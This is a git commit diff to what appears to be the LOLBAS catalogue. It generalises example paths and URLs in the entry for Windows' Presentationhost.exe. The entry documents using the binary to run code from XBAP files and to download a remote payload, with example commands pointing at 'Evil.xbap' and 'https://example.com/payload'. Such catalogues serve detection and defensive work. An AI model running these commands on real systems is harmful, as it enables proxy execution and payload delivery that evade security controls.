Generalising file paths and urls, see #10 (#422)

This commit is contained in:
Wietze
2025-01-28 11:15:01 +00:00
committed by GitHub
parent e62749f81a
commit a79893e7ad
196 changed files with 555 additions and 758 deletions

View File

@@ -4,16 +4,16 @@ Description: File is used for executing Browser applications
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Presentationhost.exe C:\temp\Evil.xbap
- Command: Presentationhost.exe {PATH_ABSOLUTE:.xbap}
Description: Executes the target XAML Browser Application (XBAP) file
Usecase: Execute code within xbap files
Usecase: Execute code within XBAP files
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: XBAP
- Command: Presentationhost.exe https://example.com/payload
- Command: Presentationhost.exe {REMOTEURL}
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server
Category: Download